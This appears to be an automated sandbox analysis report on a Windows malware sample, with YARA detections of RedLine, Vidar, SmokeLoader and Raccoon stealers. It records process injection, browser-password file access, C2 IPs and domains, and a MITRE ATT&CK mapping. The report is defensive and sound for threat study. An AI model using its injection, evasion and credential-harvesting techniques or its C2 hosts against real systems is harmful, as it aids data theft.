                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess created: C:\Users\user\AppData\Local\Temp\DF3A.exe C:\Users\user\AppData\Local\Temp\DF3A.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ServiceModelReg.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ServiceModelReg.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57E730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,
                Source: explorer.exe, 0000000A.00000000.297850308.00000000011E0000.00000002.00020000.sdmpBinary or memory string: Program Manager
                Source: explorer.exe, 0000000A.00000000.297627398.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
                Source: explorer.exe, 0000000A.00000000.297850308.00000000011E0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 0000000A.00000000.297850308.00000000011E0000.00000002.00020000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 0000000A.00000000.297850308.00000000011E0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                Source: explorer.exe, 0000000A.00000000.302532259.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
                Source: C:\Users\user\AppData\Local\Temp\B096.exeQueries volume information: C:\Users\user\AppData\Local\Temp\B096.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\B096.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\B096.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\BBE1.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DF3A.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DF3A.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Users\user\Desktop\Md0q201V1D.exeCode function: 0_2_00421CF0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B574020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion,

                Stealing of Sensitive Information:

                barindex
                Yara detected RedLine StealerShow sources
                Source: Yara matchFile source: 40.0.ServiceModelReg.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 40.0.ServiceModelReg.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 39.0.DF3A.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 40.0.ServiceModelReg.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 39.0.DF3A.exe.400000.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 39.0.DF3A.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 40.0.ServiceModelReg.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 40.0.ServiceModelReg.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.aspnet_state.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 24.2.B096.exe.4426e00.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 24.2.B096.exe.4446e20.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 39.0.DF3A.exe.400000.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.0.aspnet_state.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.0.aspnet_state.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 40.2.ServiceModelReg.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.0.aspnet_state.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.0.aspnet_state.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 24.2.B096.exe.4446e20.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.0.aspnet_state.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 39.0.DF3A.exe.400000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 24.2.B096.exe.4426e00.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000027.00000000.489693993.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000000.488918061.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000028.00000000.483819247.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000028.00000002.507631653.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000000.439226875.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000028.00000000.480873861.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000000.438304869.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000000.439894383.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000000.440496476.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000000.488076798.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000028.00000000.483001107.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.503371064.0000000003E09000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.466743057.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000028.00000000.484896100.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000000.487377447.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Yara detected VidarShow sources
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Yara detected SmokeLoaderShow sources
                Source: Yara matchFile source: 29.3.CBF0.exe.3080000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.21.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.1.gbhudtb.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.CBF0.exe.3070e50.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.CBF0.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.1.Md0q201V1D.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.Md0q201V1D.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.gbhudtb.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.21.exe.2cc15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Md0q201V1D.exe.2d815a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.1.21.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.gbhudtb.2cb15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.gbhudtb.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.gbhudtb.2be15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.0.21.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.1.gbhudtb.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.0.21.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.0.21.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000000.326584645.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.400930179.0000000002061000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.400697119.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000003.438106147.0000000003080000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.449845582.0000000000561000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.449446646.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.338103224.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.481901309.00000000048F1000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.453324146.00000000031C1000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.453199313.0000000003090000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.338316447.0000000001F91000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.480747015.0000000002D30000.00000004.00000001.sdmp, type: MEMORY
                Yara detected Raccoon StealerShow sources
                Source: Yara matchFile source: 35.3.C066.exe.4960000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 35.3.C066.exe.4960000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000023.00000003.479598454.0000000004960000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: C066.exe PID: 5604, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)Show sources
                Source: C:\Users\user\AppData\Local\Temp\C066.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Local\Temp\C066.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

                Remote Access Functionality:

                barindex
                Yara detected RedLine StealerShow sources
                Source: Yara matchFile source: 40.0.ServiceModelReg.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 40.0.ServiceModelReg.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 39.0.DF3A.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 40.0.ServiceModelReg.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 39.0.DF3A.exe.400000.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 39.0.DF3A.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 40.0.ServiceModelReg.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 40.0.ServiceModelReg.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.aspnet_state.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 24.2.B096.exe.4426e00.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 24.2.B096.exe.4446e20.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 39.0.DF3A.exe.400000.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.0.aspnet_state.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.0.aspnet_state.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 40.2.ServiceModelReg.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.0.aspnet_state.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.0.aspnet_state.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 24.2.B096.exe.4446e20.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.0.aspnet_state.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 39.0.DF3A.exe.400000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 24.2.B096.exe.4426e00.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000027.00000000.489693993.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000000.488918061.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000028.00000000.483819247.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000028.00000002.507631653.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000000.439226875.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000028.00000000.480873861.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000000.438304869.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000000.439894383.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000000.440496476.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000000.488076798.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000028.00000000.483001107.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.503371064.0000000003E09000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.466743057.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000028.00000000.484896100.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000000.487377447.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Yara detected VidarShow sources
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Yara detected SmokeLoaderShow sources
                Source: Yara matchFile source: 29.3.CBF0.exe.3080000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.21.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.1.gbhudtb.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.CBF0.exe.3070e50.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.CBF0.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.1.Md0q201V1D.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.Md0q201V1D.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.gbhudtb.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.21.exe.2cc15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Md0q201V1D.exe.2d815a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.1.21.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.gbhudtb.2cb15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.gbhudtb.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.gbhudtb.2be15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.0.21.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.1.gbhudtb.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.0.21.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.0.21.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000000.326584645.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.400930179.0000000002061000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.400697119.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000003.438106147.0000000003080000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.449845582.0000000000561000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.449446646.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.338103224.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.481901309.00000000048F1000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.453324146.00000000031C1000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.453199313.0000000003090000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.338316447.0000000001F91000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.480747015.0000000002D30000.00000004.00000001.sdmp, type: MEMORY
                Yara detected Raccoon StealerShow sources
                Source: Yara matchFile source: 35.3.C066.exe.4960000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 35.3.C066.exe.4960000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000023.00000003.479598454.0000000004960000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: C066.exe PID: 5604, type: MEMORYSTR

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsNative API1DLL Side-Loading11DLL Side-Loading11Disable or Modify Tools1OS Credential Dumping1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer14Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsShared Modules1Boot or Logon Initialization ScriptsProcess Injection612Deobfuscate/Decode Files or Information1Input Capture1File and Directory Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsExploitation for Client Execution1Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information3Security Account ManagerSystem Information Discovery15SMB/Windows Admin SharesInput Capture1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing23NTDSSecurity Software Discovery431Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol5SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptTimestomp1LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol116Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading11Cached Domain CredentialsVirtualization/Sandbox Evasion131VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading11Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Virtualization/Sandbox Evasion131/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection612Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronHidden Files and Directories1Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 511702 Sample: Md0q201V1D.exe Startdate: 29/10/2021 Architecture: WINDOWS Score: 100 83 mas.to 2->83 85 github.com 2->85 87 3 other IPs or domains 2->87 129 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->129 131 Multi AV Scanner detection for domain / URL 2->131 133 Found malware configuration 2->133 135 15 other signatures 2->135 12 Md0q201V1D.exe 2->12         started        14 gbhudtb 2->14         started        17 gbhudtb 2->17         started        19 bhhudtb 2->19         started        signatures3 process4 signatures5 21 Md0q201V1D.exe 12->21         started        153 Injects a PE file into a foreign processes 14->153 24 gbhudtb 14->24         started        155 Contains functionality to inject code into remote processes 17->155 26 gbhudtb 17->26         started        process6 signatures7 137 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 21->137 139 Maps a DLL or memory area into another process 21->139 141 Checks if the current machine is a virtual machine (disk enumeration) 21->141 28 explorer.exe 10 21->28 injected 143 Creates a thread in another existing process (thread injection) 24->143 process8 dnsIp9 99 216.128.137.31, 80 AS-CHOOPAUS United States 28->99 101 znpst.top 211.59.14.90, 50089, 80 SKB-ASSKBroadbandCoLtdKR Korea Republic of 28->101 103 6 other IPs or domains 28->103 75 C:\Users\user\AppData\Roaming\gbhudtb, PE32 28->75 dropped 77 C:\Users\user\AppData\Local\TempBBE.exe, PE32 28->77 dropped 79 C:\Users\user\AppData\Local\Temp\DF3A.exe, PE32 28->79 dropped 81 18 other files (9 malicious) 28->81 dropped 157 System process connects to network (likely due to code injection or exploit) 28->157 159 Benign windows process drops PE files 28->159 161 Deletes itself after installation 28->161 163 Hides that the sample has been downloaded from the Internet (zone.identifier) 28->163 33 CBF0.exe 1 28->33         started        37 21.exe 28->37         started        39 EBBE.exe 28->39         started        41 4 other processes 28->41 file10 signatures11 process12 dnsIp13 71 C:\Users\user\AppData\Local\Temp\1105.tmp, PE32 33->71 dropped 111 Multi AV Scanner detection for dropped file 33->111 113 DLL reload attack detected 33->113 115 Detected unpacking (changes PE section rights) 33->115 127 2 other signatures 33->127 44 21.exe 37->44         started        117 Maps a DLL or memory area into another process 39->117 119 Checks if the current machine is a virtual machine (disk enumeration) 39->119 121 Creates a thread in another existing process (thread injection) 39->121 93 194.180.174.181, 50078, 80 MIVOCLOUDMD unknown 41->93 95 93.115.20.139, 28978, 49978 MVPShttpswwwmvpsnetEU Romania 41->95 97 6 other IPs or domains 41->97 73 C:\Users\user\AppData\LocalLow\sqlite3.dll, PE32 41->73 dropped 123 Tries to harvest and steal browser information (history, passwords, etc) 41->123 125 Sample uses process hollowing technique 41->125 47 aspnet_state.exe 12 41->47         started        49 ServiceModelReg.exe 41->49         started        51 DF3A.exe 41->51         started        